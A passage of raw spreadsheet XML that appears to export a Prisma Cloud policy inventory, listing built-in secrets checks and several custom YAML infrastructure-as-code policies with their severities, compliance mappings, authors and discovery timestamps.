        </is>
      </c>
      <c r="AD633" t="b">
        <v>1</v>
      </c>
      <c r="AE633" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF633" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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3" t="inlineStr">
        <is>
          <t>f75c8a06-27af-4588-8e30-dd25f3be2c20</t>
        </is>
      </c>
      <c r="AI633" t="inlineStr"/>
      <c r="AJ633" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK633" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" t="inlineStr"/>
      <c r="B634" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C634" s="2" t="inlineStr"/>
      <c r="D634" t="inlineStr"/>
      <c r="E634" t="inlineStr"/>
      <c r="F634" t="inlineStr"/>
      <c r="G634" t="b">
        <v>1</v>
      </c>
      <c r="H6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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J634" t="inlineStr">
        <is>
          <t>Code:Secrets:azure-virtual</t>
        </is>
      </c>
      <c r="K634" t="inlineStr">
        <is>
          <t>Secrets are exposed in Azure VM customData</t>
        </is>
      </c>
      <c r="L634" t="inlineStr"/>
      <c r="M634" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N634" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O634" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P634" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q634" t="inlineStr"/>
      <c r="R634" t="inlineStr"/>
      <c r="S634" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T634" t="b">
        <v>0</v>
      </c>
      <c r="U634" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V634" t="inlineStr">
        <is>
          <t>Code:Secrets:azure-virtual-machine</t>
        </is>
      </c>
      <c r="W634" t="inlineStr">
        <is>
          <t>Ensure that no sensitive credentials are exposed in VM custom_data</t>
        </is>
      </c>
      <c r="X634" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-secrets-policies/bc-azr-secrets-2</t>
        </is>
      </c>
      <c r="Y634" t="inlineStr"/>
      <c r="Z634" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["azurerm_virtual_machine"]}</t>
        </is>
      </c>
      <c r="AA634" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB634" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC634" t="inlineStr">
        <is>
          <t>CKV_AZURE_45</t>
        </is>
      </c>
      <c r="AD634" t="b">
        <v>1</v>
      </c>
      <c r="AE634" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF634" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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4" t="inlineStr">
        <is>
          <t>b006d03f-1272-4de1-ba20-106ef7c09109</t>
        </is>
      </c>
      <c r="AI634" t="inlineStr"/>
      <c r="AJ634" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK634" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" t="inlineStr"/>
      <c r="B635" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C635" s="2" t="inlineStr"/>
      <c r="D635" t="inlineStr"/>
      <c r="E635" t="inlineStr"/>
      <c r="F635" t="inlineStr"/>
      <c r="G635" t="b">
        <v>1</v>
      </c>
      <c r="H6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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J635" t="inlineStr">
        <is>
          <t>Code:Secrets:openstack-compute</t>
        </is>
      </c>
      <c r="K635" t="inlineStr">
        <is>
          <t>OpenStack instance use basic credentials</t>
        </is>
      </c>
      <c r="L635" t="inlineStr"/>
      <c r="M635" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N635" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O635" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P635" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q635" t="inlineStr"/>
      <c r="R635" t="inlineStr"/>
      <c r="S635" t="inlineStr"/>
      <c r="T635" t="b">
        <v>0</v>
      </c>
      <c r="U635" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V635" t="inlineStr">
        <is>
          <t>Code:Secrets:openstack-compute-instance-v2</t>
        </is>
      </c>
      <c r="W635" t="inlineStr">
        <is>
          <t>Ensure that instance does not use basic credentials</t>
        </is>
      </c>
      <c r="X635" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/openstack-policies/openstack-policy-index/ensure-openstack-instance-does-not-use-basic-credentials</t>
        </is>
      </c>
      <c r="Y635" t="inlineStr"/>
      <c r="Z635" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["openstack_compute_instance_v2"]}</t>
        </is>
      </c>
      <c r="AA635" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB635" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC635" t="inlineStr">
        <is>
          <t>CKV_OPENSTACK_4</t>
        </is>
      </c>
      <c r="AD635" t="b">
        <v>1</v>
      </c>
      <c r="AE635" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF635" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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5" t="inlineStr">
        <is>
          <t>0784c873-e95d-4b13-ae13-aa50dcf28bd3</t>
        </is>
      </c>
      <c r="AI635" t="inlineStr"/>
      <c r="AJ635" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK635" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" t="inlineStr"/>
      <c r="B636" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C636" s="2" t="inlineStr"/>
      <c r="D636" t="inlineStr"/>
      <c r="E636" t="inlineStr"/>
      <c r="F636" t="inlineStr"/>
      <c r="G636" t="b">
        <v>1</v>
      </c>
      <c r="H6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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J636" t="inlineStr">
        <is>
          <t>IaC:"general":"aws":"AWS::RDS::DBInstance"</t>
        </is>
      </c>
      <c r="K636" t="inlineStr">
        <is>
          <t>SWA - AWS Ensure Neptune databases have IAMDatabaseAuthenticationEnabled is true</t>
        </is>
      </c>
      <c r="L636" t="inlineStr"/>
      <c r="M636" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N636" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O636" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P636" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q636" t="inlineStr"/>
      <c r="R636" t="inlineStr"/>
      <c r="S636" t="inlineStr"/>
      <c r="T636" t="b">
        <v>0</v>
      </c>
      <c r="U636" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V636" t="inlineStr">
        <is>
          <t>IaC:"general":"aws":"AWS::RDS::DBInstance"</t>
        </is>
      </c>
      <c r="W636" t="inlineStr"/>
      <c r="X636" t="inlineStr"/>
      <c r="Y636" t="inlineStr"/>
      <c r="Z636" t="inlineStr">
        <is>
          <t>---
metadata:
  guidelines: "SWA - AWS Ensure Neptune databases have IAMDatabaseAuthenticationEnabled is true"
  severity: "high"
  name: "SWA - AWS Ensure Neptune databases have IAMDatabaseAuthenticationEnabled is true"
  category: "general"
scope:
  provider: "aws"
definition:
  and:
    - cond_type: "attribute"
      resource_types:
        - "AWS::RDS::DBInstance"
      attribute: "Engine"
      operator: "equals"
      value: "neptune"
    - cond_type: "attribute"
      resource_types:
        - "AWS::RDS::DBInstance"
      attribute: "EnableIAMDatabaseAuthentication"
      operator: "contains"
      value: "true"</t>
        </is>
      </c>
      <c r="AA636" t="inlineStr">
        <is>
          <t>Ricardo Valdez</t>
        </is>
      </c>
      <c r="AB636" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC636" t="inlineStr"/>
      <c r="AD636" t="b">
        <v>0</v>
      </c>
      <c r="AE636" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF636" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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6" t="inlineStr">
        <is>
          <t>99960368-e0e1-4159-9338-9a0fb448e7ad</t>
        </is>
      </c>
      <c r="AI636" t="inlineStr"/>
      <c r="AJ636" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK636" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" t="inlineStr">
        <is>
          <t>CIS v1.2.0 (AWS)</t>
        </is>
      </c>
      <c r="B637" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C637" s="2" t="inlineStr"/>
      <c r="D637" t="inlineStr"/>
      <c r="E637" t="inlineStr"/>
      <c r="F637" t="inlineStr"/>
      <c r="G637" t="b">
        <v>0</v>
      </c>
      <c r="H6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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J637" t="inlineStr">
        <is>
          <t>IaC:"general":"aws":"aws_instance"</t>
        </is>
      </c>
      <c r="K637" t="inlineStr">
        <is>
          <t>Demo-Code-Editor-Policy</t>
        </is>
      </c>
      <c r="L637" t="inlineStr"/>
      <c r="M637" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N637" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O637" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P637" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q637" t="inlineStr">
        <is>
          <t>1</t>
        </is>
      </c>
      <c r="R637" t="inlineStr">
        <is>
          <t>1.12</t>
        </is>
      </c>
      <c r="S637" t="inlineStr">
        <is>
          <t>CIS,AWS</t>
        </is>
      </c>
      <c r="T637" t="b">
        <v>0</v>
      </c>
      <c r="U637" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V637" t="inlineStr">
        <is>
          <t>IaC:"general":"aws":"aws_instance"</t>
        </is>
      </c>
      <c r="W637" t="inlineStr">
        <is>
          <t>Demo-Code-Editor-Policy</t>
        </is>
      </c>
      <c r="X637" t="inlineStr"/>
      <c r="Y637" t="inlineStr"/>
      <c r="Z637" t="inlineStr">
        <is>
          <t>---
metadata:
  name: "Demo-Code-Editor-Policy"
  severity: "high"
  guidelines: "Demo-Code-Editor-Policy"
  category: "general" 
scope:
  provider: "aws"
definition:
  or:
   - cond_type: "attribute"
     resource_types:
     - "aws_instance"
     attribute: "instance_type"
     operator: "equals"
     value: "t3.micro"
   - cond_type: "attribute"
     resource_types:
     - "aws_instance"
     attribute: "instance_type"
     operator: "equals"
     value: "t3.nano"</t>
        </is>
      </c>
      <c r="AA637" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB637" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC637" t="inlineStr"/>
      <c r="AD637" t="b">
        <v>0</v>
      </c>
      <c r="AE637" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF637" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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7" t="inlineStr">
        <is>
          <t>ed4cad36-18d1-4b9d-8dd1-7ff97adca1bf</t>
        </is>
      </c>
      <c r="AI637" t="inlineStr"/>
      <c r="AJ637" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK637" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" t="inlineStr">
        <is>
          <t>ISO 27002:2022</t>
        </is>
      </c>
      <c r="B638" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C638" s="2" t="inlineStr"/>
      <c r="D638" t="inlineStr"/>
      <c r="E638" t="inlineStr"/>
      <c r="F638" t="inlineStr"/>
      <c r="G638" t="b">
        <v>0</v>
      </c>
      <c r="H6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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J638" t="inlineStr">
        <is>
          <t>IaC:"general":"aws":"aws_instance"</t>
        </is>
      </c>
      <c r="K638" t="inlineStr">
        <is>
          <t>Test Code Security Custom Policy</t>
        </is>
      </c>
      <c r="L638" t="inlineStr"/>
      <c r="M638" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N638" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O638" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P638" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q638" t="inlineStr">
        <is>
          <t>Physical controls.</t>
        </is>
      </c>
      <c r="R638" t="inlineStr">
        <is>
          <t>7.10</t>
        </is>
      </c>
      <c r="S638" t="inlineStr"/>
      <c r="T638" t="b">
        <v>0</v>
      </c>
      <c r="U638" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V638" t="inlineStr">
        <is>
          <t>IaC:"general":"aws":"aws_instance"</t>
        </is>
      </c>
      <c r="W638" t="inlineStr"/>
      <c r="X638" t="inlineStr"/>
      <c r="Y638" t="inlineStr"/>
      <c r="Z638" t="inlineStr">
        <is>
          <t>---
metadata:
  name: "Test Code Security Custom Policy"
  severity: "high"
  guidelines: "Test" #add text that explains the configuration the policy looks for, its implications, and how to fix it
  category: "general" 
scope:
  provider: "aws"
definition:
  or:
   - cond_type: "attribute"
     resource_types:
     - "aws_instance"
     attribute: "instance_type"
     operator: "equals"
     value: "t3.micro"
   - cond_type: "attribute"
     resource_types:
     - "aws_instance"
     attribute: "instance_type"
     operator: "equals"
     value: "t3.nano"</t>
        </is>
      </c>
      <c r="AA638" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB638" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC638" t="inlineStr"/>
      <c r="AD638" t="b">
        <v>0</v>
      </c>
      <c r="AE638" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF638" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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8" t="inlineStr">
        <is>
          <t>d8a69c18-68c1-479c-9ca1-996d7c7eeaf0</t>
        </is>
      </c>
      <c r="AI638" t="inlineStr"/>
      <c r="AJ638" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK638" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" t="inlineStr">
        <is>
          <t>Copy of CIS Controls v8, CIS Controls v8</t>
        </is>
      </c>
      <c r="B639" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C639" s="2" t="inlineStr"/>
      <c r="D639" t="inlineStr"/>
      <c r="E639" t="inlineStr"/>
      <c r="F639" t="inlineStr"/>
      <c r="G639" t="b">
        <v>0</v>
      </c>
      <c r="H6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39" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J639" t="inlineStr">
        <is>
          <t>IaC:"general":"aws":"aws_instance"</t>
        </is>
      </c>
      <c r="K639" t="inlineStr">
        <is>
          <t>CM S3 Bucket ACL where a log delivery-WRITE is not recommended</t>
        </is>
      </c>
      <c r="L639" t="inlineStr"/>
      <c r="M639" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N639" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O639" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P639" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q639" t="inlineStr">
        <is>
          <t>CIS Control 2</t>
        </is>
      </c>
      <c r="R639" t="inlineStr">
        <is>
          <t>2.1</t>
        </is>
      </c>
      <c r="S639" t="inlineStr"/>
      <c r="T639" t="b">
        <v>0</v>
      </c>
      <c r="U639" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V639" t="inlineStr">
        <is>
          <t>IaC:"general":"aws":"aws_instance"</t>
        </is>
      </c>
      <c r="W639" t="inlineStr">
        <is>
          <t>The log Delivery group gets WRITE and READ_ACP permission on the bucket, thus cloud allow access to sensitive data</t>
        </is>
      </c>
      <c r="X639" t="inlineStr"/>
      <c r="Y639" t="inlineStr"/>
      <c r="Z639" t="inlineStr">
        <is>
          <t>---
metadata:
  name: "CM S3 Bucket ACL where a log delivery-WRITE is not recommended "
  severity: "medium"
  guidelines: " The log Delivery group gets WRITE and READ_ACP permission on the bucket, thus cloud allow access to sensitive data"
  category: "general" 
scope:
  provider: "aws"
definition:
  or:
   - cond_type: "attribute"
     resource_types:
     - "aws_instance"
     attribute: "instance_type"
     operator: "equals"
     value: "t3.micro"
   - cond_type: "attribute"
     resource_types:
     - "aws_instance"
     attribute: "instance_type"
     operator: "equals"
     value: "t3.nano"</t>
        </is>
      </c>
      <c r="AA639" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB639" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC639" t="inlineStr"/>
      <c r="AD639" t="b">
        <v>0</v>
      </c>
      <c r="AE639" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF639" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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39" t="inlineStr">
        <is>
          <t>aeaf92d7-33e2-4b4f-8092-0afd8f2ea068</t>
        </is>
      </c>
      <c r="AI639" t="inlineStr"/>
      <c r="AJ639" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK639" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" t="inlineStr">
        <is>
          <t>kashan ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM)</t>
        </is>
      </c>
      <c r="B640" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C640" s="2" t="inlineStr"/>
      <c r="D640" t="inlineStr"/>
      <c r="E640" t="inlineStr"/>
      <c r="F640" t="inlineStr"/>
      <c r="G640" t="b">
        <v>0</v>
      </c>
      <c r="H6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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J640" t="inlineStr">
        <is>
          <t>IaC:"general":"aws":"aws_lambda_function"</t>
        </is>
      </c>
      <c r="K640" t="inlineStr">
        <is>
          <t>DM_TEST_Code_builds</t>
        </is>
      </c>
      <c r="L640" t="inlineStr"/>
      <c r="M640" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N640" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O640" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P640" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q640" t="inlineStr">
        <is>
          <t>Guidelines for Cyber Security Roles</t>
        </is>
      </c>
      <c r="R640" t="inlineStr">
        <is>
          <t>ISM-0714</t>
        </is>
      </c>
      <c r="S640" t="inlineStr"/>
      <c r="T640" t="b">
        <v>0</v>
      </c>
      <c r="U640" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V640" t="inlineStr">
        <is>
          <t>IaC:"general":"aws":"aws_lambda_function"</t>
        </is>
      </c>
      <c r="W640" t="inlineStr"/>
      <c r="X640" t="inlineStr"/>
      <c r="Y640" t="inlineStr"/>
      <c r="Z640" t="inlineStr">
        <is>
          <t>---
metadata:
  name: "DM_TEST_Code_builds"
  severity: "informational"
  guidelines: "build_test" #add text that explains the configuration the policy looks for, its implications, and how to fix it
  category: "general" #choose one: "general"/"iam"/"kubernetes"/"monitoring"/"networking"/"public"/"secrets"/"storage"
scope:
  provider: "aws" #provider is required for IaC policies. choose one: "alibaba_cloud"/"aws"/"azure"/"gcp"/"oci"
definition: #define the conditions the policy searches for.
# The example below checks EC2s with instance_type t3.micro or t3.nano. for more examples please visit our docs - https://docs.bridgecrew.io/docs/yaml-format-for-custom-policies
  and:
   - cond_type: "attribute"
     resource_types:
     - "aws_lambda_function"
     attribute: "tags.appid"
     operator: "exists"
   - cond_type: "attribute"
     resource_types: "aws_lambda_function"
     attribute: "tags.appid"
     operator: "length_greater_than_or_equal"
     value: "3"
   - cond_type: "attribute" 
     resource_types: 
     - "aws_lambda_function"
     attribute: "tags.appid"
     operator: "length_less_than_or_equal"
     value: "4"</t>
        </is>
      </c>
      <c r="AA640" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB640" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC640" t="inlineStr"/>
      <c r="AD640" t="b">
        <v>0</v>
      </c>
      <c r="AE640" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF640" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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0" t="inlineStr">
        <is>
          <t>ecd17da6-6675-49b1-84ec-8017b4ef1093</t>
        </is>
      </c>
      <c r="AI640" t="inlineStr"/>
      <c r="AJ640" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK640" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" t="inlineStr"/>
      <c r="B641" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C641" s="2" t="inlineStr"/>
      <c r="D641" t="inlineStr"/>
      <c r="E641" t="inlineStr"/>
      <c r="F641" t="inlineStr"/>
      <c r="G641" t="b">
        <v>0</v>
      </c>
      <c r="H6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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J641" t="inlineStr">
        <is>
          <t>IaC:"general":"docker":"FROM"</t>
        </is>
      </c>
      <c r="K641" t="inlineStr">
        <is>
          <t>Dockerfile alpine based images</t>
        </is>
      </c>
      <c r="L641" t="inlineStr"/>
      <c r="M641" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N641" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O641" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P641" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q641" t="inlineStr"/>
      <c r="R641" t="inlineStr"/>
      <c r="S641" t="inlineStr"/>
      <c r="T641" t="b">
        <v>0</v>
      </c>
      <c r="U641" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V641" t="inlineStr">
        <is>
          <t>IaC:"general":"docker":"FROM"</t>
        </is>
      </c>
      <c r="W641" t="inlineStr">
        <is>
          <t>Only support coker images based from alpine</t>
        </is>
      </c>
      <c r="X641" t="inlineStr"/>
      <c r="Y641" t="inlineStr"/>
      <c r="Z641" t="inlineStr">
        <is>
          <t>metadata:
  guidelines: "Dockerfile not using FROM alpine images. Please use supported image"
  name: "Dockerfile alpine based images"
  severity: "critical"
  category: "general"
scope:
  provider: "docker"
definition:
  cond_type: "attribute"
  resource_types:
    - "FROM"
  attribute: "content"
  operator: "not_contains"
  value: "alpine"</t>
        </is>
      </c>
      <c r="AA641" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB641" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC641" t="inlineStr"/>
      <c r="AD641" t="b">
        <v>0</v>
      </c>
      <c r="AE641" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF641" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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1" t="inlineStr">
        <is>
          <t>fbe20496-5b65-42c2-a1a4-4e911ce82877</t>
        </is>
      </c>
      <c r="AI641" t="inlineStr"/>
      <c r="AJ641" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK641" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" t="inlineStr"/>
      <c r="B642" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C642" s="2" t="inlineStr"/>
      <c r="D642" t="inlineStr"/>
      <c r="E642" t="inlineStr"/>
      <c r="F642" t="inlineStr"/>
      <c r="G642" t="b">
        <v>0</v>
      </c>
      <c r="H6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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J642" t="inlineStr">
        <is>
          <t>IaC:"general":"gcp":"google_compute_instance"</t>
        </is>
      </c>
      <c r="K642" t="inlineStr">
        <is>
          <t>SCB - GCP VM instances with invalid zones or missing labels</t>
        </is>
      </c>
      <c r="L642" t="inlineStr"/>
      <c r="M642" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N642" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O642" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P642" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q642" t="inlineStr"/>
      <c r="R642" t="inlineStr"/>
      <c r="S642" t="inlineStr">
        <is>
          <t>some_tag</t>
        </is>
      </c>
      <c r="T642" t="b">
        <v>0</v>
      </c>
      <c r="U642" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V642" t="inlineStr">
        <is>
          <t>IaC:"general":"gcp":"google_compute_instance"</t>
        </is>
      </c>
      <c r="W642" t="inlineStr">
        <is>
          <t>Ensure that the proper labels are attached to the virtual machine and that it is deploying to a valid zone</t>
        </is>
      </c>
      <c r="X642" t="inlineStr">
        <is>
          <t>Ensure that the proper labels are attached to the virtual machine and that it is deploying to a valid zone</t>
        </is>
      </c>
      <c r="Y642" t="inlineStr"/>
      <c r="Z642" t="inlineStr">
        <is>
          <t># Use the following documentation for reference:
#   - Terraform Resource: https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/compute_instance
#   - Checkov YAML: https://www.checkov.io/3.Custom%20Policies/YAML%20Custom%20Policies.html
#   - Jira work item: https://jira.schwab.com/browse/CLSENG-3921
#   - Terraform test: ../tests/gcp-vm-instances-with-invalid-zones-or-missing-labels/main.tf
#   - list of valid zones:
#     - https://console.cloud.google.com/iam-admin/orgpolicies/gcp-resourceLocations?organizationId=42278113357
#     - The org policy inherits its allowed zones from in:us-locations:
#     - https://cloud.google.com/resource-manager/docs/organization-policy/defining-locations#value_groups
#     - The policy's zone list excludes multi-region zones (such as nam8) b/c VMs are not multi-regional resources
#     - https://cloud.google.com/docs/geography-and-regions#regional_resources
metadata:
  name: "SCB - GCP VM instances with invalid zones or missing labels"
  # id: "gcp-vm-instances-with-invalid-zones-or-missing-labels"
  category: "general"
  # description: "Checks to ensure that builds deploy virtual machines into authorized zones and that they have labels attached"
  guidelines: "Ensure that the proper labels are attached to the virtual machine and that it is deploying to a valid zone"
  severity: "medium"
  # policy_type: "config"
  # policy_subtypes: "build"
  # enabled: false
  # pccp_ids: 
scope:
  provider: "gcp"
definition:
  and:
  - cond_type: "attribute"
    resource_types:             
    - "google_compute_instance" 
    attribute: "labels"
    operator: "exists"
  - cond_type: "attribute"
    resource_types:             
    - "google_compute_instance" 
    attribute: "zone"
    operator: "subset"
    value:
    - "us-central1-a"
    - "us-central1-b"
    - "us-central1-c"
    - "us-central1-f"
    - "us-central2-a"
    - "us-central2-b"
    - "us-central2-c"
    - "us-central2-d"
    - "us-east1-a"
    - "us-east1-b"
    - "us-east1-c"
    - "us-east1-c"
    - "us-east4-a"
    - "us-east4-b"
    - "us-east4-c"
    - "us-east5-a"
    - "us-east5-b"
    - "us-east5-c"
    - "us-south1-a"
    - "us-south1-b"
    - "us-south1-c"
    - "us-west1-a"
    - "us-west1-b"
    - "us-west1-c"
    - "us-west2-a"
    - "us-west2-b"
    - "us-west2-c"
    - "us-west3-a"
    - "us-west3-b"</t>
        </is>
      </c>
